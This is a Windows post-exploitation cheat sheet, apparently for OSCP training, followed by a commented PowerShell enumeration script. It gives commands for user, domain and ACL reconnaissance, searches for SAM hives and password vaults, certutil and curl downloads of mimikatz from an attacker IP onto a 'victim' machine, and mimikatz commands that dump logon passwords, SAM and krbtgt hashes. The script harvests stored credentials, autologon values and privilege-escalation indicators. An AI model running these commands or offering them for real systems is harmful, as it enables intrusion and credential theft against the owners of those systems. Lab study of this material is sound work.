Windows
Note: if the following commands do not work, try the following:
1. Run - PATH=%PATH%;c:\windows\system32
Alternate PATH - PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0;C:\windows\System32\OpenSSH;C:\Program Files\dotnet\
2. Use the binary directly from C:\Windows\System32\
whoami
whoami /all
whoami /user
whoami /priv
whoami /groups
net user
wmic <user>
dir env:
Get-LocalUser
net user
net user <username> /domain
# Check if account is active in domain
net localgroup administrators
net share
net computer <computer name>
net accounts # Get password requirements
Key information -
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"
Network information -
netstat -ano
ipconfig
Detect the current console (cmd vs PowerShell) -
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
where /r C:\Users\ *.txt
-> where /r C:\ local.txt
-> where /r C:\ proof.txt
where /r C:\ *.uac
where /r C:\ *.dll
dir C:\
To find specific files -
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue
dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<>\xampp\htdocs
Indicators of a web document root:
> .htaccess, public_html, www, htdocs, httpdocs
Get-History
(Get-PSReadlineOption).HistorySavePath
powershell -ep bypass
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service name>'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# Avoid running Get-CimInstance on non-interactive shells
certutil.exe -urlcache -split -f http://<Kali IP>/Watch-Command.ps1 Watch-Command.ps1
Import-Module .\Watch-Command.ps1
Get-Process <process name> -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30
icacls <binary full path>
powershell -ep bypass
Import-Module .\PowerView.ps1
Commands:
Get-NetDomain OR Get-Domain
Get-NetUser
Get-NetUser -SPN | select samaccountname, serviceprincipalname
Get-NetUser (User CN name)
To filter the result, pipe the output into a select statement
Example: Get-NetUser | select cn, name, pwdlastset, lastlogon
Get-NetGroup
Get-NetGroup <Group name>
To filter the result, pipe the output into a select statement
Example: Get-NetGroup | select cn, member
Get-NetComputer
Get-NetComputer <Computer name>
To filter the result, pipe the output into a select statement
Example: Get-NetComputer | select cn, operatingsystem, dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName <Computer name> -Verbose - Used to find logged-on users on the target computer
Permissions for NetSessionEnum are defined by the SrvsvcSessionInfo entry under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity
Get-NetComputer | Select-Object Name, @{Name='IPAddress';Expression={(Resolve-DnsName $_.Name).IPAddress}}
Get-Acl <Registry hive>:<Registry Key path> | fl
Get-ObjectAcl -Identity <user name | group name>
- Look at the ActiveDirectoryRights and SecurityIdentifier fields in the output
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier,ActiveDirectoryRights
Convert-SIDToName <SID>
OR
"<SID>", "<SID>", "<SID>" | Convert-SIDToName
Get-NetGPO
Get-GPPermission -Name "<GPO displayname>" -All
On the attacker machine:
/usr/share/peass/winpeas/winPEASx64.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe
/usr/share/peass/winpeas/winPEASx86.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx86.exe
Transfer the matching executable (x64 or x86) onto the compromised system
Run the executable and review its output
On the Kali machine:
wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
On the victim machine:
certutil -urlcache -split -f http://192.168.45.165/mimikatz.exe mimikatz.exe
curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
To Run:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # Find user NTLM hash
lsadump::lsa /patch # Find krbtgt NTLM hash
OR
Pass Mimikatz commands as arguments to the executable file
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"
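# Windows Enumeration Script (WSC) — script header.
# $extended is accepted for interface compatibility with existing callers;
# nothing in this script reads it.
param($extended)

# Separator line printed above and below every section heading by whost.
# (A stray bare `$lines` expression used to precede this assignment; it only
# emitted $null into the script's output stream, so it has been dropped.)
$lines="------------------------------------------"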
# Prints a section heading framed by the script-scope $lines separator,
# all in yellow, directly to the host (not to the output stream).
# $a - heading text to show between the two separator lines.
function whost($a) {
    $yellow = @{ ForegroundColor = 'Yellow' }
    Write-Host @yellow $lines
    Write-Host @yellow " "$a
    Write-Host @yellow $lines
}
# Opening banner. The argument is a single multi-line string literal, so its
# line breaks and spacing are part of the output — edit with care.
whost "
******************************************************************
******************************************************************
** OSCP Script usage **
** Windows Enumeration Script (WSC) **
** Written by: infosecsanyam **
** Support by absolomb **
******************************************************************
******************************************************************"
# Record when the run started so the console output can be lined up with host logs.
$Access = Get-Date
Write-Output "[***] You ran this script on $Access [***]"
# Determine OS running on target
$ComputerName = $env:computername
# NOTE(review): fragile pipeline. `("=", "}", "{")[0]` appears to index the
# separator list, so the only separator actually applied is "=", and the
# trailing `select-string windows` yields MatchInfo objects rather than a plain
# string. Get-WmiObject is also not available in PowerShell 7+ (Get-CimInstance
# is the replacement). Left unchanged because only the `-match "10"` test below
# consumes $OS.
$OS = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName | select caption | select-string windows)-split("=", "}", "{")[0] -replace "}"| select-string windows
# Only captions containing "10" are announced; any other version prints nothing here.
If ($OS -match "10") {Write-Output "[*] You are running $OS"}
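# Ordered table of section heading -> command text. Entries run in the order
# listed. Each value is a string that RunCommands evaluates with
# Invoke-Expression, so values must stay literal, script-defined text and must
# never be built from input taken outside this script. Because the values are
# single-quoted here, `$env:...` references inside them are expanded only when
# the command is evaluated.
# Note: Start-Process emits nothing without -PassThru, so the `| ft` after the
# Start-Process entries is a no-op; those tools write straight to the console.
$standard_commands = [ordered]@{
'Basic System Information Results' = 'Start-Process "systeminfo" -NoNewWindow -Wait | ft';
'Environment Variables Results' = 'Get-ChildItem Env: | ft Key,Value';
'Network Information Results' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
'DNS Servers Results' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
'ARP cache Results' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
'Routing Table Results' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
'Network Connections Results' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
'Connected Drives Results' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
'Firewall Config Results' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
'Credential Manager Results' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft';
'User Autologon Registry Items Results' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
'Local Groups Results' = 'Get-LocalGroup | ft Name';
'Local Administrators Results' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
'User Directories Results' = 'Get-ChildItem C:\Users | ft Name';
# Fix: the original used cmd-style %SYSTEMROOT%, which PowerShell does not
# expand, so Test-Path always checked a literal relative path and returned False.
'Searching for SAM backup files Results' = 'Test-Path $env:SystemRoot\repair\SAM ; Test-Path $env:SystemRoot\system32\config\regback\SAM';
'Installed Software Directories Results' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
'Software in Registry Results' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
'Folders with Everyone Permissions Results' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
# Fix: -match takes a regex, and "\U" is not a valid .NET regex escape; the
# resulting exception was swallowed by the catch, so this entry silently
# reported nothing. The backslash is now escaped.
'Folders with BUILTIN\User Permissions Results' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\\Users"} } catch {}} | ft';
# Reports only whether the HKCU Installer policy key exists; it does not read
# the AlwaysInstallElevated value, so True here is not confirmation on its own.
'Checking registry for AlwaysInstallElevated Results' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
'Unquoted Service Paths Results' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
'Scheduled Tasks Results' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
'Tasks Folder Results' = 'Get-ChildItem C:\Windows\Tasks | ft';
'Startup Commands Results' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
'Host File content Results' = 'Get-content $env:windir\System32\drivers\etc\hosts | out-string';
'Running Services Results' = 'Get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096';
# Win32_Product enumeration is slow and triggers a Windows Installer
# consistency check per product, which is written to the Application event
# log — expect a long wait and noticeable noise on the host.
'Installed Softwares in Computer Results' = 'Get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096';
'Installed Patches Results' = 'Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string';
'Recent Documents Used Results' = 'get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent" -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string';
# Fix: the -Include list had "*.vnc.*.ini" (a dot instead of a comma), so
# neither .vnc nor .ini files were matched; heading typo also corrected.
'Potentially Interesting files Results' = 'get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc,*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string | ft';
'Last 10 Modified items Results' = 'Get-ChildItem "C:\Users" -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} | %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string';
'Stored Credentials Results' = 'cmdkey /list | out-string';
'Localgroup Administrators Results' = 'net localgroup Administrators';
'Current User Results' = 'Write-Host $env:UserDomain\$env:UserName';
'User Privileges Results' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
'Local Users Results' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
'Logged in Users Results' = 'gcim Win32_LoggedOnUser | ft';
'Running Processes Results' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
}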
# Runs every entry of an enumeration table in order: prints the entry's
# heading via whost, then evaluates its command text.
# $commands - dictionary of heading -> PowerShell command text.
# The values go through Invoke-Expression, so this function must only ever be
# given the script's own literal table, never text that originates outside it.
function RunCommands($commands) {
    foreach ($heading in $commands.Keys) {
        whost $heading
        $commandText = $commands[$heading]
        Invoke-Expression $commandText
    }
}
# Entry point: run the standard table, announce completion, then hold the
# window open so a user who launched the script by double-click can read it.
RunCommands -commands $standard_commands
whost 'Script finished!'
Read-Host -Prompt 'Press Enter to exit'